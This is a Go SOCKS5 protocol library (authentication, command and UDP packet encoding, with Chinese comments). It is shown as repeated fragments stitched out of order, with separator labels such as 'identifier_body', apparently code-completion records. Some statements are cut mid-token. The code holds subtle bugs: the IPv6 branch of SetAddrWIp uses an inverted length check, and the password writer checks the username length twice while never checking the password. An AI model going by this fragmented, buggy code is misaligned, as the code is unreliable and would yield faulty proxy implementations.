err := p.SetAddrWIp(udpAddr.IP)
if err != nil {
return fmt.Errorf("SetAddrWIp,%v", err)
}
p.SetAddrWPort(udpAddr.Port)
return nil
}
func (p *Socks5UdpPack) SetAddrWIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
p.Ip = ipv4
p.ATYP = Socks5CmdAtypTypeIP4
return nil
}
ipv6 := ip.To16()
if len(ipv6) != net.IPv6len {
p.Ip = ipv6
p.ATYP = Socks5CmdAtypTypeIP6
return nil
}
return fmt.Errorf("非预期的 ip 版本,%v", ip)
}
func (p *Socks5UdpPack) SetAddrWPort(port int) {
p.Port = uint16(port)
}
func (p *Socks5UdpPack) GetUdpAddr() (*net.UDPAddr, error) {
switch p.ATYP {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
return &net.UDPAddr{
IP: p.Ip,
Port: int(p.Port),
Zone: "",
}, nil
default:
return nil, fmt.Errorf("非预期的地址类型")
}
}
| io.Read | identifier_name |
socks5.go | package socks5
import (
"encoding/binary"
"fmt"
"io"
"net"
"strconv"
"github.com/gamexg/proxylib/mempool"
)
// socks5 版本号
const Socks5Version byte = 0x05
// socks5 鉴定方式
// 无需鉴定 和 用户名密码鉴定
type Socks5AuthMethodType byte
const (
Socks5AuthMethodTypeNone Socks5AuthMethodType = 0x00
Socks5AuthMethodTypePassword Socks5AuthMethodType = 0x02
// 当服务端不支持客户端的鉴定方式时,返回这个类型
// 客户端需要立刻关闭连接
Socks5AuthMethodTypeErr Socks5AuthMethodType = 0xFF
)
// socks5 请求类型 ,socks5 cmd 状态回复
// socks5 请求类型有:tcp 传出连接、 tcp 传入连接 或 udp 连接
// socks5 回复状态有: 成功、一般性失败、规则不允许转发、主机不可达、atyp不支持、cmd命令不支持 等
type Socks5CmdType byte
const (
Socks5CmdTypeConnect Socks5CmdType = 0x01
Socks5CmdTypeBind Socks5CmdType = 0x02
Socks5CmdTypeUdpAssociate Socks5CmdType = 0x3
// cmd 回复,成功
Socks5CmdReplySucceeded Socks5CmdType = 0x00
// cmd 回复,普通SOCKS服务器连接失败
Socks5CmdReplyGeneralSocksServerFailure Socks5CmdType = 0x01
// cmd 回复,规则不允许
Socks5CmdReplyConnectionNotAllowedByRuleset Socks5CmdType = 0x02
// cmd 回复,网络不可达
Socks5CmdReplyNetworkUnreachable Socks5CmdType = 0x03
// cmd 回复,主机不可达
Socks5CmdReplyHostUnreachable Socks5CmdType = 0x04
// cmd 回复,连接被拒绝
Socks5CmdReplyConnectionRefused Socks5CmdType = 0x05
// cmd 回复,ttl超时
Socks5CmdReplyTtlExpired Socks5CmdType = 0x06
// cmd 回复,不支持的命令
Socks5CmdReplyCommandNotSupported Socks5CmdType = 0x07
// cmd 回复,不支持的地址类型
Socks5CmdReplyAddressTypeNotSupported Socks5CmdType = 0x08
// 用户自定义范围 0x09- 0xFF
// 自定义,内部错误
Socks5CmdReplyInternalError Socks5CmdType = 0x010
)
// socks 5 cmd 命令 Atyp 类型
type Socks5AtypType byte
const (
//内部使用,根据 cmd.host、cmd.Ip 内容自动确定 atyp 值
Socks5CmdAtypTypeAuto Socks5AtypType = 0x00
Socks5CmdAtypTypeIP4 Socks5AtypType = 0x01
Socks5CmdAtypTypeDomain Socks5AtypType = 0x03
Socks5CmdAtypTypeIP6 Socks5AtypType = 0x04
)
type Socks5AuthPasswordRStatusType byte
const (
// 用户名、密码正确
Socks5AuthPasswordRStatusTypeSucceeded Socks5AuthPasswordRStatusType = 0x00
// 用户名、密码错误
Socks5AuthPasswordRStatusTypeErr Socks5AuthPasswordRStatusType = 0x01
)
// 鉴定请求
type Socks5AuthPack struct {
Ver byte // 版本5
Methods []Socks5AuthMethodType
}
// 鉴定回应
type Socks5AuthRPack struct {
Ver byte // 版本 5
Method Socks5AuthMethodType
}
// 命令及回应
type Socks5CmdPack struct {
Ver byte // 版本 5
Cmd Socks5CmdType
Rsv byte
Atyp Socks5AtypType
Host []byte
Port uint16
}
// 用户名、密码
type Socks5AuthPasswordPack struct {
Ver byte //目前版本为 1
Username string
Password string
}
type Socks5AuthPasswordRPack struct {
Ver byte //目前版本为 1
Status Socks5AuthPasswordRStatusType // 0 成功 1失败
}
func (auth *Socks5AuthPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
b := buf[:2]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth head, %v", err)
}
auth.Ver = b[0]
nmethods := b[1]
if auth.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", auth.Ver)
}
b = buf[:uint8(nmethods)]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth methods, %v", err)
}
methods := make([]Socks5AuthMethodType, len(b))
for i := range methods {
methods[i] = Socks5AuthMethodType(b[i])
}
auth.Methods = methods
return nil
}
func (auth *Socks5AuthPack) HasMethod(m Socks5AuthMethodType) bool {
for _, v := range auth.Methods {
if v == m {
return true
}
}
return false
}
// 读取鉴定
// 注意,所有这种类型的操作都是阻塞的,需要自己设置超时机制
// 内部会检查协议版本等参数。
func ReadAuth(r io.Reader) (*Socks5AuthPack, error) {
auth := Socks5AuthPack{}
err := auth.Read(r)
if err != nil {
return nil, err
}
return &auth, nil
}
func (auth *Socks5AuthPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = 5
buf[1] = uint8(len(auth.Methods))
for _, v := range auth.Methods {
buf = append(buf, byte(v))
}
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write,%v", err)
}
return nil
}
func WriteAuth(w io.Writer, auth *Socks5AuthPack) error {
if auth == nil {
return fmt.Errorf("auth is nil")
}
return auth.Write(w)
}
func ReadSocks5AuthR(r io.Reader) (*Socks5AuthRPack, error) {
ar := Socks5AuthRPack{}
err := ar.Read(r)
if err != nil {
return nil, err
}
return &ar, err
}
func (ar *Socks5AuthRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
ar.Ver = buf[0]
ar.Method = Socks5AuthMethodType(buf[1])
if ar.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", buf[0])
}
return nil
}
func WriteSocks5AuthR(w io.Writer, cmd *Socks5AuthRPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5AuthRPack) Write(w io.Writer) error {
if _, err := w.Write([]byte{cmd.Ver, byte(cmd.Method)}); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func WriteSocks5Cmd(w io.Writer, cmd *Socks5CmdPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5CmdPack) Write(w io.Writer) error {
hostSize := len(cmd.Host)
if cmd.Atyp == Socks5CmdAtypTypeDomain && hostSize > 255 {
return fmt.Errorf("domain %v is too long", cmd.Host)
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
port := [2]byte{0}
binary.BigEndian.PutUint16(port[:], cmd.Port)
buf[0] = cmd.Ver
buf[1] = byte(cmd.Cmd)
buf[2] = cmd.Rsv
buf[3] = byte(cmd.Atyp)
buf = buf[:4]
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
buf = append(buf, cmd.Host...)
case Socks5CmdAtypTypeDomain:
buf = append(buf, uint8(len(cmd.Host)))
buf = append(buf, []byte(cmd.Host)...)
default:
return fmt.Errorf("unknown atyp %v type", cmd.Atyp)
}
buf = append(buf, port[0], port[1])
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func ReadSocks5Cmd(r io.Reader) (*Socks5CmdPack, error) {
cmd := Socks5CmdPack{}
err := cmd.Read(r)
if err != nil {
return nil, err
}
return &cmd, nil
}
// 请确定 cmd.Host 指向的内容未被其他位置使用,本函数会复用 cmd.Host 空间
func (cmd *Socks5CmdPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:4]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 command head, %v", err)
}
cmd.Ver = buf[0]
cmd.Cmd = Socks5CmdType(buf[1])
cmd.Rsv = buf[2]
cmd.Atyp = Socks5AtypType(buf[3])
if cmd.Ver != 5 {
return fmt.Errorf("unexpected protocol version %v ", cmd.Ver)
}
/* 这个不应该由这里判断。
if cmd.Cmd != 0x01 && cmd.Cmd != 0x02 && cmd.Cmd != 0x03 {
return nil, fmt.Errorf("未知的命令,cmd:%v。", cmd.Cmd)
}*/
/*if cmd.atyp == Socks5CmdAtypTypeIP4 {
buf = buf[:net.IPv4len]
}else */
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4:
buf = buf[:net.IPv4len]
case Socks5CmdAtypTypeIP6:
buf = buf[:net.IPv6len]
case Socks5CmdAtypTypeDomain:
buf = buf[:1]
default:
return fmt.Errorf("unexpected address type %v", cmd.Atyp)
}
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
cmd.Host = append(cmd.Host[:0], buf...)
case Socks5CmdAtypTypeDomain:
buf = buf[:buf[0]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
cmd.Host = append(cmd.Host, buf...)
}
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Port, %v", err)
}
cmd.Port = binary.BigEndian.Uint16(buf)
return nil
}
func (s *Socks5CmdPack) GetHostString() (string, error) {
switch s.Atyp {
case Socks5CmdAtypTypeIP4:
ip := net.IP(s.Host)
ip = ip.To4()
if len(ip) != net.IPv4len {
return "", fmt.Errorf("%v is not ipv4 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeIP6:
ip := net.IP(s.Host)
ip = ip.To16()
if len(ip) != net.IPv6len {
return "", fmt.Errorf("%v is not ipv6 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeDomain:
return string(s.Host), nil
default:
return "", fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) GetAddrString() (string, error) {
host, err := s.GetHostString()
if err != nil {
return "", err
}
return net.JoinHostPort(host, strconv.Itoa(int(s.Port))), nil
}
func (s *Socks5CmdPack) SetAddrAuto(addr string) error {
host, portStr, err := net.SplitHostPort(addr)
if err != nil {
return err
}
port, err := strconv.Atoi(portStr)
if err != nil {
return err
}
if port < 0 || port > 0xFFFF {
return fmt.Errorf("port %v < 0 || port %v > 0xFFFF", port, port)
}
s.SetHostAuto(host)
s.Port = uint16(port)
return nil
}
func (s *Socks5CmdPack) GetHostIp() (net.IP, error) {
var ip net.IP
switch s.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
ip = net.IP(s.Host)
return ip, nil
case Socks5CmdAtypTypeDomain:
ip = net.ParseIP(string(s.Host))
if len(ip) == 0 {
return nil, fmt.Errorf("%v is not ip address", s.Host)
}
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
return ipv4, nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
return ipv6, nil
}
return nil, fmt.Errorf("%v is not ipv4 or ipv6 address", s.Host)
default:
return nil, fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) SetHostAuto(v string) {
ip := net.ParseIP(v)
if len(ip) != 0 {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return
}
}
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(v)
return
}
func (s *Socks5CmdPack) SetHostDomain(domain string) {
s.Atyp = Socks5CmdAtypTypeDomain
s.Host = []byte(domain)
}
func (s *Socks5CmdPack) SetHostIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
s.Atyp = Socks5CmdAtypTypeIP4
s.Host = []byte(ipv4)
return nil
}
ipv6 := ip.To16()
if len(ipv6) == net.IPv6len {
s.Atyp = Socks5CmdAtypTypeIP6
s.Host = []byte(ipv6)
return nil
}
return fmt.Errorf("%v is not ipv4 or ipv6 address", ip)
}
func ReadSocks5AuthPassword(r io.Reader) (*Socks5AuthPasswordPack, error) {
p := Socks5AuthPasswordPack{}
err := p.Read(r)
if err != nil {
return nil, err
}
return &p, nil
}
func (p *Socks5AuthPasswordPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth head, %v", err)
}
p.Ver = buf[0]
l := buf[1]
if p.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", p.Ver)
}
buf = buf[:l+1]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Username, %v", err)
}
p.Username = string(buf[:len(buf)-1])
buf = buf[:buf[len(buf)-1]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 auth.Password, %v", err)
}
p.Password = string(buf)
return nil
}
func WriteSocks5AuthPassword(w io.Writer, pass *Socks5AuthPasswordPack) error {
if pass == nil {
return fmt.Errorf("pass is nil")
}
return pass.Write(w)
}
func (pass *Socks5AuthPasswordPack) Write(w io.Writer) error {
if len(pass.Username) > 0xFF || len(pass.Username) > 0xFF {
return fmt.Errorf("username or password is too long")
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = pass.Ver
buf[1] = uint8(len(pass.Username))
buf = append(buf, []byte(pass.Username)...)
buf = append(buf, uint8(len(pass.Password)))
buf = append(buf, pass.Password...)
if _, err := w.Write(buf); err != nil {
return err
}
return nil
}
func ReadSocks5AuthPasswordR(r io.Reader) (*Socks5AuthPasswordRPack, error) {
pr := Socks5AuthPasswordRPack{}
err := pr.Read(r)
if err != nil {
return nil, err
}
return &pr, nil
}
func (pr *Socks5AuthPasswordRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(bu | o.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = r.Ver
buf[1] = byte(r.Status)
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
type Socks5UdpPack struct {
Rsv uint16
FRAG byte
ATYP Socks5AtypType
Host string
Ip net.IP
Port uint16
Data []byte
}
func (p *Socks5UdpPack) Parse(data []byte) error {
if len(data) < 11 {
return fmt.Errorf("data length is too short")
}
rsv := binary.BigEndian.Uint16(data)
frag := data[2]
atyp := Socks5AtypType(data[3])
ip := p.Ip[:0]
host := ""
portData := data
switch Socks5AtypType(atyp) {
case Socks5CmdAtypTypeIP4:
ip = append(ip, data[4:4+net.IPv4len]...)
portData = data[4+net.IPv4len:]
case Socks5CmdAtypTypeIP6:
if len(data) < 23 {
return fmt.Errorf("data length is too short")
}
ip = append(ip, data[4:4+net.IPv6len]...)
portData = data[4+net.IPv6len:]
case Socks5CmdAtypTypeDomain:
l := int(data[4])
if len(data) < 7+l {
return fmt.Errorf("data length is too short")
}
host = string(data[5 : 5+l])
portData = data[5+l:]
default:
return fmt.Errorf("unexpected atyp %v", atyp)
}
*p = Socks5UdpPack{}
port := binary.BigEndian.Uint16(portData[:2])
udpData := portData[2:]
p.Rsv = rsv
p.FRAG = frag
p.ATYP = atyp
p.Host = host
p.Ip = append(p.Ip[:0], ip...)
p.Port = port
p.Data = append(p.Data[:0], udpData...)
return nil
}
func (p *Socks5UdpPack) To(data []byte) (int, error) {
atyp := Socks5AtypType(p.ATYP)
ip := p.Ip
host := []byte(p.Host)
hostSize := 0
port := p.Port
if atyp == Socks5CmdAtypTypeAuto {
if len(ip) == 0 {
ip = net.ParseIP(p.Host)
}
if len(ip) == 0 {
atyp = Socks5CmdAtypTypeDomain
} else {
if ipv4 := ip.To4(); len(ipv4) == net.IPv4len {
ip = ipv4
}
switch len(ip) {
case net.IPv4len:
atyp = Socks5CmdAtypTypeIP4
ip = ip
case net.IPv6len:
atyp = Socks5CmdAtypTypeIP6
default:
return 0, fmt.Errorf("ip %v length is incorrect", ip)
}
}
}
switch atyp {
case Socks5CmdAtypTypeIP4:
ip = ip.To4()
if len(ip) != net.IPv4len {
return 0, fmt.Errorf("ipv4 %v length is incorrect", ip)
}
hostSize = net.IPv4len
case Socks5CmdAtypTypeIP6:
if len(ip) != net.IPv6len {
return 0, fmt.Errorf("ipv6 %v length is incorrect", ip)
}
hostSize = net.IPv6len
case Socks5CmdAtypTypeDomain:
if len(host) > 0xFF {
return 0, fmt.Errorf("host %v is too long", host)
}
hostSize = len(host) + 1
default:
return 0, fmt.Errorf("unexpected atyp %v", atyp)
}
mustSize := 6 + hostSize + len(p.Data)
if len(data) < mustSize {
return mustSize, fmt.Errorf("not enough space")
}
binary.BigEndian.PutUint16(data, p.Rsv)
data[2] = p.FRAG
data[3] = byte(atyp)
switch atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
copy(data[4:4+hostSize], ip)
case Socks5CmdAtypTypeDomain:
data[4] = byte(len(host))
copy(data[4+1:4+hostSize], host)
}
binary.BigEndian.PutUint16(data[4+hostSize:], port)
copy(data[4+hostSize+2:], p.Data)
return mustSize, nil
}
func (p *Socks5UdpPack) SetAddr(addr net.Addr) error {
udpAddr, _ := addr.(*net.UDPAddr)
if udpAddr == nil {
return fmt.Errorf("非预期的 udpAddr 格式, %v", addr)
}
err := p.SetAddrWIp(udpAddr.IP)
if err != nil {
return fmt.Errorf("SetAddrWIp,%v", err)
}
p.SetAddrWPort(udpAddr.Port)
return nil
}
func (p *Socks5UdpPack) SetAddrWIp(ip net.IP) error {
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
p.Ip = ipv4
p.ATYP = Socks5CmdAtypTypeIP4
return nil
}
ipv6 := ip.To16()
if len(ipv6) != net.IPv6len {
p.Ip = ipv6
p.ATYP = Socks5CmdAtypTypeIP6
return nil
}
return fmt.Errorf("非预期的 ip 版本,%v", ip)
}
func (p *Socks5UdpPack) SetAddrWPort(port int) {
p.Port = uint16(port)
}
func (p *Socks5UdpPack) GetUdpAddr() (*net.UDPAddr, error) {
switch p.ATYP {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
return &net.UDPAddr{
IP: p.Ip,
Port: int(p.Port),
Zone: "",
}, nil
default:
return nil, fmt.Errorf("非预期的地址类型")
}
}
| f)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
pr.Ver = buf[0]
pr.Status = Socks5AuthPasswordRStatusType(buf[1])
if pr.Ver != 1 {
return fmt.Errorf("unexpected protocol version %v", pr.Ver)
}
return nil
}
func WriteSocks5AuthPasswordR(w io.Writer, r *Socks5AuthPasswordRPack) error {
if r == nil {
return fmt.Errorf("r is nil")
}
return r.Write(w)
}
func (r *Socks5AuthPasswordRPack) Write(w i | identifier_body |
socks5.go | package socks5
import (
"encoding/binary"
"fmt"
"io"
"net"
"strconv"
"github.com/gamexg/proxylib/mempool"
)
// socks5 版本号
const Socks5Version byte = 0x05
// socks5 鉴定方式
// 无需鉴定 和 用户名密码鉴定
type Socks5AuthMethodType byte
const (
Socks5AuthMethodTypeNone Socks5AuthMethodType = 0x00
Socks5AuthMethodTypePassword Socks5AuthMethodType = 0x02
// 当服务端不支持客户端的鉴定方式时,返回这个类型
// 客户端需要立刻关闭连接
Socks5AuthMethodTypeErr Socks5AuthMethodType = 0xFF
)
// socks5 请求类型 ,socks5 cmd 状态回复
// socks5 请求类型有:tcp 传出连接、 tcp 传入连接 或 udp 连接
// socks5 回复状态有: 成功、一般性失败、规则不允许转发、主机不可达、atyp不支持、cmd命令不支持 等
type Socks5CmdType byte
const (
Socks5CmdTypeConnect Socks5CmdType = 0x01
Socks5CmdTypeBind Socks5CmdType = 0x02
Socks5CmdTypeUdpAssociate Socks5CmdType = 0x3
// cmd 回复,成功
Socks5CmdReplySucceeded Socks5CmdType = 0x00
// cmd 回复,普通SOCKS服务器连接失败
Socks5CmdReplyGeneralSocksServerFailure Socks5CmdType = 0x01
// cmd 回复,规则不允许
Socks5CmdReplyConnectionNotAllowedByRuleset Socks5CmdType = 0x02
// cmd 回复,网络不可达
Socks5CmdReplyNetworkUnreachable Socks5CmdType = 0x03
// cmd 回复,主机不可达
Socks5CmdReplyHostUnreachable Socks5CmdType = 0x04
// cmd 回复,连接被拒绝
Socks5CmdReplyConnectionRefused Socks5CmdType = 0x05
// cmd 回复,ttl超时
Socks5CmdReplyTtlExpired Socks5CmdType = 0x06
// cmd 回复,不支持的命令
Socks5CmdReplyCommandNotSupported Socks5CmdType = 0x07
// cmd 回复,不支持的地址类型
Socks5CmdReplyAddressTypeNotSupported Socks5CmdType = 0x08
// 用户自定义范围 0x09- 0xFF
// 自定义,内部错误
Socks5CmdReplyInternalError Socks5CmdType = 0x010
)
// socks 5 cmd 命令 Atyp 类型
type Socks5AtypType byte
const (
//内部使用,根据 cmd.host、cmd.Ip 内容自动确定 atyp 值
Socks5CmdAtypTypeAuto Socks5AtypType = 0x00
Socks5CmdAtypTypeIP4 Socks5AtypType = 0x01
Socks5CmdAtypTypeDomain Socks5AtypType = 0x03
Socks5CmdAtypTypeIP6 Socks5AtypType = 0x04
)
type Socks5AuthPasswordRStatusType byte
const (
// 用户名、密码正确
Socks5AuthPasswordRStatusTypeSucceeded Socks5AuthPasswordRStatusType = 0x00
// 用户名、密码错误
Socks5AuthPasswordRStatusTypeErr Socks5AuthPasswordRStatusType = 0x01
)
// 鉴定请求
type Socks5AuthPack struct {
Ver byte // 版本5
Methods []Socks5AuthMethodType
}
// 鉴定回应
type Socks5AuthRPack struct {
Ver byte // 版本 5
Method Socks5AuthMethodType
}
// 命令及回应
type Socks5CmdPack struct {
Ver byte // 版本 5
Cmd Socks5CmdType
Rsv byte
Atyp Socks5AtypType
Host []byte
Port uint16
}
// 用户名、密码
type Socks5AuthPasswordPack struct {
Ver byte //目前版本为 1
Username string
Password string
}
type Socks5AuthPasswordRPack struct {
Ver byte //目前版本为 1
Status Socks5AuthPasswordRStatusType // 0 成功 1失败
}
func (auth *Socks5AuthPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
b := buf[:2]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth head, %v", err)
}
auth.Ver = b[0]
nmethods := b[1]
if auth.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", auth.Ver)
}
b = buf[:uint8(nmethods)]
if _, err := io.ReadFull(r, b); err != nil {
return fmt.Errorf("failed to read socks5 auth methods, %v", err)
}
methods := make([]Socks5AuthMethodType, len(b))
for i := range methods {
methods[i] = Socks5AuthMethodType(b[i])
}
auth.Methods = methods
return nil
}
func (auth *Socks5AuthPack) HasMethod(m Socks5AuthMethodType) bool {
for _, v := range auth.Methods {
if v == m {
return true
}
}
return false
}
// 读取鉴定
// 注意,所有这种类型的操作都是阻塞的,需要自己设置超时机制
// 内部会检查协议版本等参数。
func ReadAuth(r io.Reader) (*Socks5AuthPack, error) {
auth := Socks5AuthPack{}
err := auth.Read(r)
if err != nil {
return nil, err
}
return &auth, nil
}
func (auth *Socks5AuthPack) Write(w io.Writer) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
buf[0] = 5
buf[1] = uint8(len(auth.Methods))
for _, v := range auth.Methods {
buf = append(buf, byte(v))
}
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write,%v", err)
}
return nil
}
func WriteAuth(w io.Writer, auth *Socks5AuthPack) error {
if auth == nil {
return fmt.Errorf("auth is nil")
}
return auth.Write(w)
}
func ReadSocks5AuthR(r io.Reader) (*Socks5AuthRPack, error) {
ar := Socks5AuthRPack{}
err := ar.Read(r)
if err != nil {
return nil, err
}
return &ar, err
}
func (ar *Socks5AuthRPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return err
}
ar.Ver = buf[0]
ar.Method = Socks5AuthMethodType(buf[1])
if ar.Ver != 5 {
return fmt.Errorf("ver %v is incorrect", buf[0])
}
return nil
}
func WriteSocks5AuthR(w io.Writer, cmd *Socks5AuthRPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5AuthRPack) Write(w io.Writer) error {
if _, err := w.Write([]byte{cmd.Ver, byte(cmd.Method)}); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func WriteSocks5Cmd(w io.Writer, cmd *Socks5CmdPack) error {
if cmd == nil {
return fmt.Errorf("cmd is nil")
}
return cmd.Write(w)
}
func (cmd *Socks5CmdPack) Write(w io.Writer) error {
hostSize := len(cmd.Host)
if cmd.Atyp == Socks5CmdAtypTypeDomain && hostSize > 255 {
return fmt.Errorf("domain %v is too long", cmd.Host)
}
buf := mempool.Get(1024)
defer mempool.Put(buf)
port := [2]byte{0}
binary.BigEndian.PutUint16(port[:], cmd.Port)
buf[0] = cmd.Ver
buf[1] = byte(cmd.Cmd)
buf[2] = cmd.Rsv
buf[3] = byte(cmd.Atyp)
buf = buf[:4]
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
buf = append(buf, cmd.Host...)
case Socks5CmdAtypTypeDomain:
buf = append(buf, uint8(len(cmd.Host))) | ..)
default:
return fmt.Errorf("unknown atyp %v type", cmd.Atyp)
}
buf = append(buf, port[0], port[1])
if _, err := w.Write(buf); err != nil {
return fmt.Errorf("w.write, %v", err)
}
return nil
}
func ReadSocks5Cmd(r io.Reader) (*Socks5CmdPack, error) {
cmd := Socks5CmdPack{}
err := cmd.Read(r)
if err != nil {
return nil, err
}
return &cmd, nil
}
// 请确定 cmd.Host 指向的内容未被其他位置使用,本函数会复用 cmd.Host 空间
func (cmd *Socks5CmdPack) Read(r io.Reader) error {
buf := mempool.Get(1024)
defer mempool.Put(buf)
buf = buf[:4]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks 5 command head, %v", err)
}
cmd.Ver = buf[0]
cmd.Cmd = Socks5CmdType(buf[1])
cmd.Rsv = buf[2]
cmd.Atyp = Socks5AtypType(buf[3])
if cmd.Ver != 5 {
return fmt.Errorf("unexpected protocol version %v ", cmd.Ver)
}
/* 这个不应该由这里判断。
if cmd.Cmd != 0x01 && cmd.Cmd != 0x02 && cmd.Cmd != 0x03 {
return nil, fmt.Errorf("未知的命令,cmd:%v。", cmd.Cmd)
}*/
/*if cmd.atyp == Socks5CmdAtypTypeIP4 {
buf = buf[:net.IPv4len]
}else */
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4:
buf = buf[:net.IPv4len]
case Socks5CmdAtypTypeIP6:
buf = buf[:net.IPv6len]
case Socks5CmdAtypTypeDomain:
buf = buf[:1]
default:
return fmt.Errorf("unexpected address type %v", cmd.Atyp)
}
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
switch cmd.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
cmd.Host = append(cmd.Host[:0], buf...)
case Socks5CmdAtypTypeDomain:
buf = buf[:buf[0]]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Host, %v", err)
}
cmd.Host = append(cmd.Host, buf...)
}
buf = buf[:2]
if _, err := io.ReadFull(r, buf); err != nil {
return fmt.Errorf("failed to read socks5 cmd.Port, %v", err)
}
cmd.Port = binary.BigEndian.Uint16(buf)
return nil
}
func (s *Socks5CmdPack) GetHostString() (string, error) {
switch s.Atyp {
case Socks5CmdAtypTypeIP4:
ip := net.IP(s.Host)
ip = ip.To4()
if len(ip) != net.IPv4len {
return "", fmt.Errorf("%v is not ipv4 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeIP6:
ip := net.IP(s.Host)
ip = ip.To16()
if len(ip) != net.IPv6len {
return "", fmt.Errorf("%v is not ipv6 address", s.Host)
}
return ip.String(), nil
case Socks5CmdAtypTypeDomain:
return string(s.Host), nil
default:
return "", fmt.Errorf("unexpected atyp %v", s.Atyp)
}
}
func (s *Socks5CmdPack) GetAddrString() (string, error) {
host, err := s.GetHostString()
if err != nil {
return "", err
}
return net.JoinHostPort(host, strconv.Itoa(int(s.Port))), nil
}
func (s *Socks5CmdPack) SetAddrAuto(addr string) error {
host, portStr, err := net.SplitHostPort(addr)
if err != nil {
return err
}
port, err := strconv.Atoi(portStr)
if err != nil {
return err
}
if port < 0 || port > 0xFFFF {
return fmt.Errorf("port %v < 0 || port %v > 0xFFFF", port, port)
}
s.SetHostAuto(host)
s.Port = uint16(port)
return nil
}
func (s *Socks5CmdPack) GetHostIp() (net.IP, error) {
var ip net.IP
switch s.Atyp {
case Socks5CmdAtypTypeIP4, Socks5CmdAtypTypeIP6:
ip = net.IP(s.Host)
return ip, nil
case Socks5CmdAtypTypeDomain:
ip = net.ParseIP(string(s.Host))
if len(ip) == 0 {
return nil, fmt.Errorf("%v is not ip address", s.Host)
}
ipv4 := ip.To4()
if len(ipv4) == net.IPv4len {
return ipv4, nil
}
ipv6 := ip.To16()
